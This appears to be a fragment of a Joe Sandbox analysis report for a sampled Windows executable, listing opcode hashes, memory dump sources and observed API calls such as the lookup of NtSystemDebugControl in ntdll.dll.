                                                • Opcode ID: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
                                                • Instruction ID: ecb8549ff3b7afa9f0a006c442787cc1df0b38573a911927a68794d2c5b03a3d
                                                • Opcode Fuzzy Hash: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
                                                • Instruction Fuzzy Hash: 7521A032E481A06ED75513357C41BED3F478FE7711F2E909AF6861F3B2D56809C682A4
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00611334
                                                • GetProcAddress.KERNEL32(00000000), ref: 0061133B
                                                • memset.MSVCRT ref: 00611359
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcmemset
                                                • String ID: NtSystemDebugControl$ntdll.dll
                                                • API String ID: 3137504439-2438149413
                                                • Opcode ID: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
                                                • Instruction ID: 78a7aec5fdf026b9ac8cb92c97bdedef9be55be53ea7163f3b40c93f0e5bfd36
                                                • Opcode Fuzzy Hash: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
                                                • Instruction Fuzzy Hash: 6801C47160034DBFDB10DF94EC859EFBBBAFB05304F08452BFA12A6240D7708685CA90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                • String ID:
                                                • API String ID: 3636361484-0
                                                • Opcode ID: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
                                                • Instruction ID: 70c8c8ec320e6e42b55024cf691f3d360f9a00e9c5fbcbf0844b3361ca4f8d26
                                                • Opcode Fuzzy Hash: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
                                                • Instruction Fuzzy Hash: FD01FE729042696FEB1057A0EC48BD67BDEDB05311F0C4067DB46D7190EA749AC4CB90